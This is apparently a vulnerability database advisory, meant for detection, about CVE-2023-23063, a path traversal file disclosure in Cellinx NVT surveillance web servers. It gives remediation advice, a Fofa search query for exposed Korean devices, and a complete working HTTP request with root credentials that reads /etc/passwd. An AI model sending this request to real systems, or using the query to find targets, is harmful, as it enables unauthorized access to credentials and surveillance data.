🔙 목록으로 돌아가기

CVE-2023-23063: Cellinx NVT Web Server - Local File Disclosure

TitleCellinx NVT Web Server - Local File Disclosure
Authordaffainfo
SeverityHigh
ImpactUnauthenticated attackers can read arbitrary files from the server through the PATH parameter in GetFileContent.cgi, potentially exposing system credentials, configuration files, and sensitive video surveillance data.
RemediationUpdate Cellinx NVT to a version newer than 1.0.6.002b that validates file paths in GetFileContent.cgi and restricts file access to authorized directories only.
CVSS Score7.5
EPSS Score0.62021
CVE IDCVE-2023-23063
CWE IDCWE-22
Fofa Querybody="/viewer/viewer.html" && header="lighttpd" && country="KR"
Tags cve cve2023 cellinx lfi nvt vkev vuln

🔍 Vulnerability Description

Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.

🌐 HTTP Request

GET /cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23063.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-23063.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A